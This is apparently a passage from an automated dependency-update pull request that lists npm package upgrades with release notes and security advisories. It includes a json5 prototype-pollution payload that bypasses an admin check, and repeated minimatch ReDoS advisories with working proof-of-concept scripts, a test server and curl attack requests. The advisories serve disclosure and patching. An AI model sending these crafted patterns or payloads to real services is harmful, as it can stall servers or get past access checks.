} else {
  throw new Error('Forbidden...');
}

If the user attempts to set the isAdmin key, their request will be rejected:

const props = JSON5.parse('{"foo": "bar", "isAdmin": true}');
if (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {
  doSomethingDangerous(props);
} else {
  throw new Error('Forbidden...'); // Error: Forbidden...
}

However, users can instead set the __proto__ key to {"isAdmin": true}. JSON5 will parse this key and will set the isAdmin key on the prototype of the returned object, allowing the user to bypass the security check and run their request as an admin:

const props = JSON5.parse('{"foo": "bar", "__proto__": {"isAdmin": true}}');
if (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {
  doSomethingDangerous(props); // "Doing dangerous thing as admin."
} else {
  throw new Error('Forbidden...');
}
Release Notes

2.2.3

  • Fix: json5@2.2.3 is now the 'latest' release according to npm instead of v1.0.2. ([#299])

2.2.2

  • Fix: Properties with the name __proto__ are added to objects and arrays.
    (#199) This also fixes a prototype pollution vulnerability reported by
    Jonathan Gregson! (#295).

2.2.1

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 35 commits:

โ†—๏ธ line-column-path (indirect, 2.0.0 โ†’ 4.0.0) ยท Repo

Release Notes

4.0.0

Breaking

Improvements

v3.0.0...v4.0.0

3.0.0

Breaking

v2.0.0...v3.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 7 commits:

โ†—๏ธ lines-and-columns (indirect, 1.1.6 โ†’ 1.2.4) ยท Repo

Sorry, we couldnโ€™t find anything useful about this release.

โ†—๏ธ lodash (indirect, 4.17.21 โ†’ 4.17.23) ยท Repo ยท Changelog

Security Advisories ๐Ÿšจ

๐Ÿšจ Lodash has Prototype Pollution Vulnerability in `_.unset` and `_.omit` functions

Impact

Lodash versions 4.0.0 through 4.17.22 are vulnerable to prototype pollution in the _.unset and _.omit functions. An attacker can pass crafted paths which cause Lodash to delete methods from global prototypes.

The issue permits deletion of properties but does not allow overwriting their original behavior.

Patches

This issue is patched on 4.17.23.

Commits

See the full diff on Github. The new version differs by 21 commits:

โ†—๏ธ log-symbols (indirect, 4.1.0 โ†’ 7.0.1) ยท Repo

Release Notes

7.0.1

v7.0.0...v7.0.1

7.0.0

Breaking

  • Switch from chalk to yoctocolors (#34) ab7ca3d
    • This is unlikely to affect anyone, but it's a major version just to be safe.

Improvements

v6.0.0...v7.0.0

6.0.0

Breaking

Improvements

v5.1.0...v6.0.0

5.1.0

v5.0.0...v5.1.0

5.0.0

Breaking

v4.1.0...v5.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 13 commits:

โ‰๏ธ lru-cache (downgrade, 6.0.0 โ†’ 5.1.1) ยท Repo ยท Changelog

โ†—๏ธ meow (indirect, 10.1.1 โ†’ 14.1.0) ยท Repo

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by 57 commits:

โ†—๏ธ micromatch (indirect, 4.0.4 โ†’ 4.0.8) ยท Repo ยท Changelog

Security Advisories ๐Ÿšจ

๐Ÿšจ Regular Expression Denial of Service (ReDoS) in micromatch

The NPM package micromatch prior to version 4.0.8 is vulnerable to Regular Expression Denial of Service (ReDoS). The vulnerability occurs in micromatch.braces() in index.js because the pattern .* will greedily match anything. By passing a malicious payload, the pattern matching will keep backtracking to the input while it doesn't find the closing bracket. As the input size increases, the consumption time will also increase until it causes the application to hang or slow down. There was a merged fix but further testing shows the issue persisted prior to #266. This issue should be mitigated by using a safe pattern that won't start backtracking the regular expression due to greedy matching.

Commits

See the full diff on Github. The new version differs by 26 commits:

โ†—๏ธ minimatch (indirect, 3.0.4 โ†’ 10.2.4) ยท Repo ยท Changelog

Security Advisories ๐Ÿšจ

๐Ÿšจ minimatch has ReDoS: matchOne() combinatorial backtracking via multiple non-adjacent GLOBSTAR segments

Summary

matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior.

Details

The vulnerable loop is in matchOne() at src/index.ts#L960:

while (fr < fl) {
  ..
  if (this.matchOne(file.slice(fr), pattern.slice(pr), partial)) {
    ..
    return true
  }
  ..
  fr++
}

When a GLOBSTAR is encountered, the function tries to match the remaining pattern against every suffix of the remaining file segments. Each ** multiplies the number of recursive calls by the number of remaining segments. With k non-adjacent globstars and n file segments, the total number of calls is C(n, k).

There is no depth counter, visited-state cache, or budget limit applied to this recursion. The call tree is fully explored before returning false on a non-matching input.

Measured timing with n=30 path segments:

k (globstars) Pattern size Time
7 36 bytes ~154ms
9 46 bytes ~1.2s
11 56 bytes ~5.4s
12 61 bytes ~9.7s
13 66 bytes ~15.9s

PoC

Tested on minimatch@10.2.2, Node.js 20.

Step 1 -- inline script

import { minimatch } from 'minimatch'

// k=9 globstars, n=30 path segments
// pattern: 46 bytes, default options
const pattern = '**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/b'
const path    = 'a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a'

const start = Date.now()
minimatch(path, pattern)
console.log(Date.now() - start + 'ms') // ~1200ms

To scale the effect, increase k:

// k=11 -> ~5.4s, k=13 -> ~15.9s
const k = 11
const pattern = Array.from({ length: k }, () => '**/a').join('/') + '/b'
const path    = Array(30).fill('a').join('/')
minimatch(path, pattern)

No special options are required. This reproduces with the default minimatch() call.

Step 2 -- HTTP server (event loop starvation proof)

The following server demonstrates the event loop starvation effect. It is a minimal harness, not a claim that this exact deployment pattern is common:

// poc1-server.mjs
import http from 'node:http'
import { URL } from 'node:url'
import { minimatch } from 'minimatch'

const PORT = 3000

const server = http.createServer((req, res) => {
  const url = new URL(req.url, `http://localhost:${PORT}`)
  if (url.pathname !== '/match') { res.writeHead(404); res.end(); return }

  const pattern = url.searchParams.get('pattern') ?? ''
  const path    = url.searchParams.get('path') ?? ''

  const start  = process.hrtime.bigint()
  const result = minimatch(path, pattern)
  const ms     = Number(process.hrtime.bigint() - start) / 1e6

  res.writeHead(200, { 'Content-Type': 'application/json' })
  res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\n')
})

server.listen(PORT)

Terminal 1 -- start the server:

node poc1-server.mjs

Terminal 2 -- send the attack request (k=11, ~5s stall) and immediately return to shell:

curl "http://localhost:3000/match?pattern=**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2Fb&path=a%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa" &

Terminal 3 -- while the attack is in-flight, send a benign request:

curl -w "\ntime_total: %{time_total}s\n" "http://localhost:3000/match?pattern=**%2Fy%2Fz&path=x%2Fy%2Fz"

Observed output (Terminal 3):

{"result":true,"ms":"0"}

time_total: 4.132709s

The server reports "ms":"0" -- the legitimate request itself takes zero processing time. The 4+ second time_total is entirely time spent waiting for the event loop to be released by the attack request. Every concurrent user is blocked for the full duration of each attack call. Repeating the benign request while no attack is in-flight confirms the baseline:

{"result":true,"ms":"0"}

time_total: 0.001599s

Impact

Any application where an attacker can influence the glob pattern passed to minimatch() is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature.

๐Ÿšจ minimatch ReDoS: nested *() extglobs generate catastrophically backtracking regular expressions

Summary

Nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally.

Details

The root cause is in AST.toRegExpSource() at src/ast.ts#L598. For the * extglob type, the close token emitted is )* or )?, wrapping the recursive body in (?:...)*. When extglobs are nested, each level adds another * quantifier around the previous group:

: this.type === '*' && bodyDotAllowed ? `)?`
: `)${this.type}`

This produces the following regexps:

Pattern Generated regex
*(a|b) /^(?:a|b)*$/
*(*(a|b)) /^(?:(?:a|b)*)*$/
*(*(*(a|b))) /^(?:(?:(?:a|b)*)*)*$/
*(*(*(*(a|b)))) /^(?:(?:(?:(?:a|b)*)*)*)*$/

These are textbook nested-quantifier patterns. Against an input of repeated a characters followed by a non-matching character z, V8's backtracking engine explores an exponential number of paths before returning false.

The generated regex is stored on this.set and evaluated inside matchOne() at src/index.ts#L1010 via p.test(f). It is reached through the standard minimatch() call with no configuration.

Measured times via minimatch():

Pattern Input Time
*(*(a|b)) a x30 + z ~68,000ms
*(*(*(a|b))) a x20 + z ~124,000ms
*(*(*(*(a|b)))) a x25 + z ~116,000ms
*(a|a) a x25 + z ~2,000ms

Depth inflection at fixed input a x16 + z:

Depth Pattern Time
1 *(a|b) 0ms
2 *(*(a|b)) 4ms
3 *(*(*(a|b))) 270ms
4 *(*(*(*(a|b)))) 115,000ms

Going from depth 2 to depth 3 with a 20-character input jumps from 66ms to 123,544ms -- a 1,867x increase from a single added nesting level.

PoC

Tested on minimatch@10.2.2, Node.js 20.

Step 1 -- verify the generated regexps and timing (standalone script)

Save as poc4-validate.mjs and run with node poc4-validate.mjs:

import { minimatch, Minimatch } from 'minimatch'

function timed(fn) {
  const s = process.hrtime.bigint()
  let result, error
  try { result = fn() } catch(e) { error = e }
  const ms = Number(process.hrtime.bigint() - s) / 1e6
  return { ms, result, error }
}

// Verify generated regexps
for (let depth = 1; depth <= 4; depth++) {
  let pat = 'a|b'
  for (let i = 0; i < depth; i++) pat = `*(${pat})`
  const re = new Minimatch(pat, {}).set?.[0]?.[0]?.toString()
  console.log(`depth=${depth} "${pat}" -> ${re}`)
}
// depth=1 "*(a|b)"          -> /^(?:a|b)*$/
// depth=2 "*(*(a|b))"       -> /^(?:(?:a|b)*)*$/
// depth=3 "*(*(*(a|b)))"    -> /^(?:(?:(?:a|b)*)*)*$/
// depth=4 "*(*(*(*(a|b))))" -> /^(?:(?:(?:(?:a|b)*)*)*)*$/

// Safe-length timing (exponential growth confirmation without multi-minute hang)
const cases = [
  ['*(*(*(a|b)))', 15],   // ~270ms
  ['*(*(*(a|b)))', 17],   // ~800ms
  ['*(*(*(a|b)))', 19],   // ~2400ms
  ['*(*(a|b))',    23],   // ~260ms
  ['*(a|b)',      101],   // <5ms (depth=1 control)
]
for (const [pat, n] of cases) {
  const t = timed(() => minimatch('a'.repeat(n) + 'z', pat))
  console.log(`"${pat}" n=${n}: ${t.ms.toFixed(0)}ms result=${t.result}`)
}

// Confirm noext disables the vulnerability
const t_noext = timed(() => minimatch('a'.repeat(18) + 'z', '*(*(*(a|b)))', { noext: true }))
console.log(`noext=true: ${t_noext.ms.toFixed(0)}ms (should be ~0ms)`)

// +() is equally affected
const t_plus = timed(() => minimatch('a'.repeat(17) + 'z', '+(+(+(a|b)))'))
console.log(`"+(+(+(a|b)))" n=18: ${t_plus.ms.toFixed(0)}ms result=${t_plus.result}`)

Observed output:

depth=1 "*(a|b)"          -> /^(?:a|b)*$/
depth=2 "*(*(a|b))"       -> /^(?:(?:a|b)*)*$/
depth=3 "*(*(*(a|b)))"    -> /^(?:(?:(?:a|b)*)*)*$/
depth=4 "*(*(*(*(a|b))))" -> /^(?:(?:(?:(?:a|b)*)*)*)*$/
"*(*(*(a|b)))" n=15: 269ms result=false
"*(*(*(a|b)))" n=17: 268ms result=false
"*(*(*(a|b)))" n=19: 2408ms result=false
"*(*(a|b))"    n=23: 257ms result=false
"*(a|b)"       n=101: 0ms result=false
noext=true: 0ms (should be ~0ms)
"+(+(+(a|b)))" n=18: 6300ms result=false

Step 2 -- HTTP server (event loop starvation proof)

Save as poc4-server.mjs:

import http from 'node:http'
import { URL } from 'node:url'
import { minimatch } from 'minimatch'

const PORT = 3001
http.createServer((req, res) => {
  const url     = new URL(req.url, `http://localhost:${PORT}`)
  const pattern = url.searchParams.get('pattern') ?? ''
  const path    = url.searchParams.get('path') ?? ''

  const start  = process.hrtime.bigint()
  const result = minimatch(path, pattern)
  const ms     = Number(process.hrtime.bigint() - start) / 1e6

  console.log(`[${new Date().toISOString()}] ${ms.toFixed(0)}ms pattern="${pattern}" path="${path.slice(0,30)}"`)
  res.writeHead(200, { 'Content-Type': 'application/json' })
  res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\n')
}).listen(PORT, () => console.log(`listening on ${PORT}`))

Terminal 1 -- start the server:

node poc4-server.mjs

Terminal 2 -- fire the attack (depth=3, 19 a's + z) and return immediately:

curl "http://localhost:3001/match?pattern=*%28*%28*%28a%7Cb%29%29%29&path=aaaaaaaaaaaaaaaaaaaz" &

Terminal 3 -- send a benign request while the attack is in-flight:

curl -w "\ntime_total: %{time_total}s\n" "http://localhost:3001/match?pattern=*%28a%7Cb%29&path=aaaz"

Observed output -- Terminal 2 (attack):

{"result":false,"ms":"64149"}

Observed output -- Terminal 3 (benign, concurrent):

{"result":false,"ms":"0"}

time_total: 63.022047s

Terminal 1 (server log):

[2026-02-20T09:41:17.624Z] pattern="*(*(*(a|b)))" path="aaaaaaaaaaaaaaaaaaaz"
[2026-02-20T09:42:21.775Z] done in 64149ms result=false
[2026-02-20T09:42:21.779Z] pattern="*(a|b)" path="aaaz"
[2026-02-20T09:42:21.779Z] done in 0ms result=false

The server reports "ms":"0" for the benign request -- the legitimate request itself requires no CPU time. The entire 63-second time_total is time spent waiting for the event loop to be released. The benign request was only dispatched after the attack completed, confirmed by the server log timestamps.

Note: standalone script timing (~7s at n=19) is lower than server timing (64s) because the standalone script had warmed up V8's JIT through earlier sequential calls. A cold server hits the worst case. Both measurements confirm catastrophic backtracking -- the server result is the more realistic figure for production impact.

Impact

Any context where an attacker can influence the glob pattern passed to minimatch() is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments, multi-tenant platforms where users configure glob-based rules (file filters, ignore lists, include patterns), and CI/CD pipelines that evaluate user-submitted config files containing glob expressions. No evidence was found of production HTTP servers passing raw user input directly as the extglob pattern, so that framing is not claimed here.

Depth 3 (*(*(*(a|b))), 12 bytes) stalls the Node.js event loop for 7+ seconds with an 18-character input. Depth 2 (*(*(a|b)), 9 bytes) reaches 68 seconds with a 31-character input. Both the pattern and the input fit in a query string or JSON body without triggering the 64 KB length guard.

+() extglobs share the same code path and produce equivalent worst-case behavior (6.3 seconds at depth=3 with an 18-character input, confirmed).

Mitigation available: passing { noext: true } to minimatch() disables extglob processing entirely and reduces the same input to 0ms. Applications that do not need extglob syntax should set this option when handling untrusted patterns.

๐Ÿšจ minimatch ReDoS: nested *() extglobs generate catastrophically backtracking regular expressions

Summary

Nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally.

Details

The root cause is in AST.toRegExpSource() at src/ast.ts#L598. For the * extglob type, the close token emitted is )* or )?, wrapping the recursive body in (?:...)*. When extglobs are nested, each level adds another * quantifier around the previous group:

: this.type === '*' && bodyDotAllowed ? `)?`
: `)${this.type}`

This produces the following regexps:

Pattern Generated regex
*(a|b) /^(?:a|b)*$/
*(*(a|b)) /^(?:(?:a|b)*)*$/
*(*(*(a|b))) /^(?:(?:(?:a|b)*)*)*$/
*(*(*(*(a|b)))) /^(?:(?:(?:(?:a|b)*)*)*)*$/

These are textbook nested-quantifier patterns. Against an input of repeated a characters followed by a non-matching character z, V8's backtracking engine explores an exponential number of paths before returning false.

The generated regex is stored on this.set and evaluated inside matchOne() at src/index.ts#L1010 via p.test(f). It is reached through the standard minimatch() call with no configuration.

Measured times via minimatch():

Pattern Input Time
*(*(a|b)) a x30 + z ~68,000ms
*(*(*(a|b))) a x20 + z ~124,000ms
*(*(*(*(a|b)))) a x25 + z ~116,000ms
*(a|a) a x25 + z ~2,000ms

Depth inflection at fixed input a x16 + z:

Depth Pattern Time
1 *(a|b) 0ms
2 *(*(a|b)) 4ms
3 *(*(*(a|b))) 270ms
4 *(*(*(*(a|b)))) 115,000ms

Going from depth 2 to depth 3 with a 20-character input jumps from 66ms to 123,544ms -- a 1,867x increase from a single added nesting level.

PoC

Tested on minimatch@10.2.2, Node.js 20.

Step 1 -- verify the generated regexps and timing (standalone script)

Save as poc4-validate.mjs and run with node poc4-validate.mjs:

import { minimatch, Minimatch } from 'minimatch'

function timed(fn) {
  const s = process.hrtime.bigint()
  let result, error
  try { result = fn() } catch(e) { error = e }
  const ms = Number(process.hrtime.bigint() - s) / 1e6
  return { ms, result, error }
}

// Verify generated regexps
for (let depth = 1; depth <= 4; depth++) {
  let pat = 'a|b'
  for (let i = 0; i < depth; i++) pat = `*(${pat})`
  const re = new Minimatch(pat, {}).set?.[0]?.[0]?.toString()
  console.log(`depth=${depth} "${pat}" -> ${re}`)
}
// depth=1 "*(a|b)"          -> /^(?:a|b)*$/
// depth=2 "*(*(a|b))"       -> /^(?:(?:a|b)*)*$/
// depth=3 "*(*(*(a|b)))"    -> /^(?:(?:(?:a|b)*)*)*$/
// depth=4 "*(*(*(*(a|b))))" -> /^(?:(?:(?:(?:a|b)*)*)*)*$/

// Safe-length timing (exponential growth confirmation without multi-minute hang)
const cases = [
  ['*(*(*(a|b)))', 15],   // ~270ms
  ['*(*(*(a|b)))', 17],   // ~800ms
  ['*(*(*(a|b)))', 19],   // ~2400ms
  ['*(*(a|b))',    23],   // ~260ms
  ['*(a|b)',      101],   // <5ms (depth=1 control)
]
for (const [pat, n] of cases) {
  const t = timed(() => minimatch('a'.repeat(n) + 'z', pat))
  console.log(`"${pat}" n=${n}: ${t.ms.toFixed(0)}ms result=${t.result}`)
}

// Confirm noext disables the vulnerability
const t_noext = timed(() => minimatch('a'.repeat(18) + 'z', '*(*(*(a|b)))', { noext: true }))
console.log(`noext=true: ${t_noext.ms.toFixed(0)}ms (should be ~0ms)`)

// +() is equally affected
const t_plus = timed(() => minimatch('a'.repeat(17) + 'z', '+(+(+(a|b)))'))
console.log(`"+(+(+(a|b)))" n=18: ${t_plus.ms.toFixed(0)}ms result=${t_plus.result}`)

Observed output:

depth=1 "*(a|b)"          -> /^(?:a|b)*$/
depth=2 "*(*(a|b))"       -> /^(?:(?:a|b)*)*$/
depth=3 "*(*(*(a|b)))"    -> /^(?:(?:(?:a|b)*)*)*$/
depth=4 "*(*(*(*(a|b))))" -> /^(?:(?:(?:(?:a|b)*)*)*)*$/
"*(*(*(a|b)))" n=15: 269ms result=false
"*(*(*(a|b)))" n=17: 268ms result=false
"*(*(*(a|b)))" n=19: 2408ms result=false
"*(*(a|b))"    n=23: 257ms result=false
"*(a|b)"       n=101: 0ms result=false
noext=true: 0ms (should be ~0ms)
"+(+(+(a|b)))" n=18: 6300ms result=false

Step 2 -- HTTP server (event loop starvation proof)

Save as poc4-server.mjs:

import http from 'node:http'
import { URL } from 'node:url'
import { minimatch } from 'minimatch'

const PORT = 3001
http.createServer((req, res) => {
  const url     = new URL(req.url, `http://localhost:${PORT}`)
  const pattern = url.searchParams.get('pattern') ?? ''
  const path    = url.searchParams.get('path') ?? ''

  const start  = process.hrtime.bigint()
  const result = minimatch(path, pattern)
  const ms     = Number(process.hrtime.bigint() - start) / 1e6

  console.log(`[${new Date().toISOString()}] ${ms.toFixed(0)}ms pattern="${pattern}" path="${path.slice(0,30)}"`)
  res.writeHead(200, { 'Content-Type': 'application/json' })
  res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\n')
}).listen(PORT, () => console.log(`listening on ${PORT}`))

Terminal 1 -- start the server:

node poc4-server.mjs

Terminal 2 -- fire the attack (depth=3, 19 a's + z) and return immediately:

curl "http://localhost:3001/match?pattern=*%28*%28*%28a%7Cb%29%29%29&path=aaaaaaaaaaaaaaaaaaaz" &

Terminal 3 -- send a benign request while the attack is in-flight:

curl -w "\ntime_total: %{time_total}s\n" "http://localhost:3001/match?pattern=*%28a%7Cb%29&path=aaaz"

Observed output -- Terminal 2 (attack):

{"result":false,"ms":"64149"}

Observed output -- Terminal 3 (benign, concurrent):

{"result":false,"ms":"0"}

time_total: 63.022047s

Terminal 1 (server log):

[2026-02-20T09:41:17.624Z] pattern="*(*(*(a|b)))" path="aaaaaaaaaaaaaaaaaaaz"
[2026-02-20T09:42:21.775Z] done in 64149ms result=false
[2026-02-20T09:42:21.779Z] pattern="*(a|b)" path="aaaz"
[2026-02-20T09:42:21.779Z] done in 0ms result=false

The server reports "ms":"0" for the benign request -- the legitimate request itself requires no CPU time. The entire 63-second time_total is time spent waiting for the event loop to be released. The benign request was only dispatched after the attack completed, confirmed by the server log timestamps.

Note: standalone script timing (~7s at n=19) is lower than server timing (64s) because the standalone script had warmed up V8's JIT through earlier sequential calls. A cold server hits the worst case. Both measurements confirm catastrophic backtracking -- the server result is the more realistic figure for production impact.

Impact

Any context where an attacker can influence the glob pattern passed to minimatch() is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments, multi-tenant platforms where users configure glob-based rules (file filters, ignore lists, include patterns), and CI/CD pipelines that evaluate user-submitted config files containing glob expressions. No evidence was found of production HTTP servers passing raw user input directly as the extglob pattern, so that framing is not claimed here.

Depth 3 (*(*(*(a|b))), 12 bytes) stalls the Node.js event loop for 7+ seconds with an 18-character input. Depth 2 (*(*(a|b)), 9 bytes) reaches 68 seconds with a 31-character input. Both the pattern and the input fit in a query string or JSON body without triggering the 64 KB length guard.

+() extglobs share the same code path and produce equivalent worst-case behavior (6.3 seconds at depth=3 with an 18-character input, confirmed).

Mitigation available: passing { noext: true } to minimatch() disables extglob processing entirely and reduces the same input to 0ms. Applications that do not need extglob syntax should set this option when handling untrusted patterns.

๐Ÿšจ minimatch has ReDoS: matchOne() combinatorial backtracking via multiple non-adjacent GLOBSTAR segments

Summary

matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior.

Details

The vulnerable loop is in matchOne() at src/index.ts#L960:

while (fr < fl) {
  ..
  if (this.matchOne(file.slice(fr), pattern.slice(pr), partial)) {
    ..
    return true
  }
  ..
  fr++
}

When a GLOBSTAR is encountered, the function tries to match the remaining pattern against every suffix of the remaining file segments. Each ** multiplies the number of recursive calls by the number of remaining segments. With k non-adjacent globstars and n file segments, the total number of calls is C(n, k).

There is no depth counter, visited-state cache, or budget limit applied to this recursion. The call tree is fully explored before returning false on a non-matching input.

Measured timing with n=30 path segments:

k (globstars) Pattern size Time
7 36 bytes ~154ms
9 46 bytes ~1.2s
11 56 bytes ~5.4s
12 61 bytes ~9.7s
13 66 bytes ~15.9s

PoC

Tested on minimatch@10.2.2, Node.js 20.

Step 1 -- inline script

import { minimatch } from 'minimatch'

// k=9 globstars, n=30 path segments
// pattern: 46 bytes, default options
const pattern = '**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/b'
const path    = 'a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a'

const start = Date.now()
minimatch(path, pattern)
console.log(Date.now() - start + 'ms') // ~1200ms

To scale the effect, increase k:

// k=11 -> ~5.4s, k=13 -> ~15.9s
const k = 11
const pattern = Array.from({ length: k }, () => '**/a').join('/') + '/b'
const path    = Array(30).fill('a').join('/')
minimatch(path, pattern)

No special options are required. This reproduces with the default minimatch() call.

Step 2 -- HTTP server (event loop starvation proof)

The following server demonstrates the event loop starvation effect. It is a minimal harness, not a claim that this exact deployment pattern is common:

// poc1-server.mjs
import http from 'node:http'
import { URL } from 'node:url'
import { minimatch } from 'minimatch'

const PORT = 3000

const server = http.createServer((req, res) => {
  const url = new URL(req.url, `http://localhost:${PORT}`)
  if (url.pathname !== '/match') { res.writeHead(404); res.end(); return }

  const pattern = url.searchParams.get('pattern') ?? ''
  const path    = url.searchParams.get('path') ?? ''

  const start  = process.hrtime.bigint()
  const result = minimatch(path, pattern)
  const ms     = Number(process.hrtime.bigint() - start) / 1e6

  res.writeHead(200, { 'Content-Type': 'application/json' })
  res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\n')
})

server.listen(PORT)

Terminal 1 -- start the server:

node poc1-server.mjs

Terminal 2 -- send the attack request (k=11, ~5s stall) and immediately return to shell:

curl "http://localhost:3000/match?pattern=**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2Fb&path=a%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa" &

Terminal 3 -- while the attack is in-flight, send a benign request:

curl -w "\ntime_total: %{time_total}s\n" "http://localhost:3000/match?pattern=**%2Fy%2Fz&path=x%2Fy%2Fz"

Observed output (Terminal 3):

{"result":true,"ms":"0"}

time_total: 4.132709s

The server reports "ms":"0" -- the legitimate request itself takes zero processing time. The 4+ second time_total is entirely time spent waiting for the event loop to be released by the attack request. Every concurrent user is blocked for the full duration of each attack call. Repeating the benign request while no attack is in-flight confirms the baseline:

{"result":true,"ms":"0"}

time_total: 0.001599s

Impact

Any application where an attacker can influence the glob pattern passed to minimatch() is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature.

๐Ÿšจ minimatch has ReDoS: matchOne() combinatorial backtracking via multiple non-adjacent GLOBSTAR segments

Summary

matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior.

Details

The vulnerable loop is in matchOne() at src/index.ts#L960:

while (fr < fl) {
  ..
  if (this.matchOne(file.slice(fr), pattern.slice(pr), partial)) {
    ..
    return true
  }
  ..
  fr++
}

When a GLOBSTAR is encountered, the function tries to match the remaining pattern against every suffix of the remaining file segments. Each ** multiplies the number of recursive calls by the number of remaining segments. With k non-adjacent globstars and n file segments, the total number of calls is C(n, k).

There is no depth counter, visited-state cache, or budget limit applied to this recursion. The call tree is fully explored before returning false on a non-matching input.

Measured timing with n=30 path segments:

k (globstars) Pattern size Time
7 36 bytes ~154ms
9 46 bytes ~1.2s
11 56 bytes ~5.4s
12 61 bytes ~9.7s
13 66 bytes ~15.9s

PoC

Tested on minimatch@10.2.2, Node.js 20.

Step 1 -- inline script

import { minimatch } from 'minimatch'

// k=9 globstars, n=30 path segments
// pattern: 46 bytes, default options
const pattern = '**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/b'
const path    = 'a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a'

const start = Date.now()
minimatch(path, pattern)
console.log(Date.now() - start + 'ms') // ~1200ms

To scale the effect, increase k:

// k=11 -> ~5.4s, k=13 -> ~15.9s
const k = 11
const pattern = Array.from({ length: k }, () => '**/a').join('/') + '/b'
const path    = Array(30).fill('a').join('/')
minimatch(path, pattern)

No special options are required. This reproduces with the default minimatch() call.

Step 2 -- HTTP server (event loop starvation proof)

The following server demonstrates the event loop starvation effect. It is a minimal harness, not a claim that this exact deployment pattern is common:

// poc1-server.mjs
import http from 'node:http'
import { URL } from 'node:url'
import { minimatch } from 'minimatch'

const PORT = 3000

const server = http.createServer((req, res) => {
  const url = new URL(req.url, `http://localhost:${PORT}`)
  if (url.pathname !== '/match') { res.writeHead(404); res.end(); return }

  const pattern = url.searchParams.get('pattern') ?? ''
  const path    = url.searchParams.get('path') ?? ''

  const start  = process.hrtime.bigint()
  const result = minimatch(path, pattern)
  const ms     = Number(process.hrtime.bigint() - start) / 1e6

  res.writeHead(200, { 'Content-Type': 'application/json' })
  res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\n')
})

server.listen(PORT)

Terminal 1 -- start the server:

node poc1-server.mjs

